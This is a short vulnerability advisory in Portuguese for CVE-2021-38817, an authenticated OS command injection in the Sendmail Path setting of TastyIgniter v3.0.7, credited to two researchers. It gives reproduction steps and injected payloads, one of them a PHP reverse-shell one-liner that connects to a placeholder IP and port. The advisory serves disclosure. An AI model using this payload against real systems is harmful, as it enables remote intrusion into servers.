
Injeção Remota de Comando no Sistema Operacional no campo Caminho do Sendmail do TastyIgniter v3.0.7
Injeção Remota de Comandos do Sistema Operacional / Execução Remota de Código Autenticada no TastyIgniter v3.0.7 - Parte web do Sendmail (CVE-2021-38817)
Existe uma vulnerabilidade de injeção remota de comandos do sistema operacional autenticada no menu de configuração do Sendmail do CMS Restaurante TastyIgniter v3.0.7 para a aplicação web. O parâmetro Caminho do Sendmail não é sanitizado corretamente, conforme indicado pelo comando /usr/sbin/sendmail -bs preenchido no campo, e permite que comandos arbitrários sejam injetados adicionando um ponto-e-vírgula e um comando adicional do sistema operacional.
/admin/settings/edit/mail/admin com credenciais./admin/settings/edit/mailProtocolo de Correio, selecione SendmailCaminho do SendMail, adicione um ponto-e-vírgula e um comando arbitrário do sistema operacional, ex.: /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) e Mike Padrick (Fearless), Agosto de 2021
CVE atribuído em Outubro de 2022 (kkkk)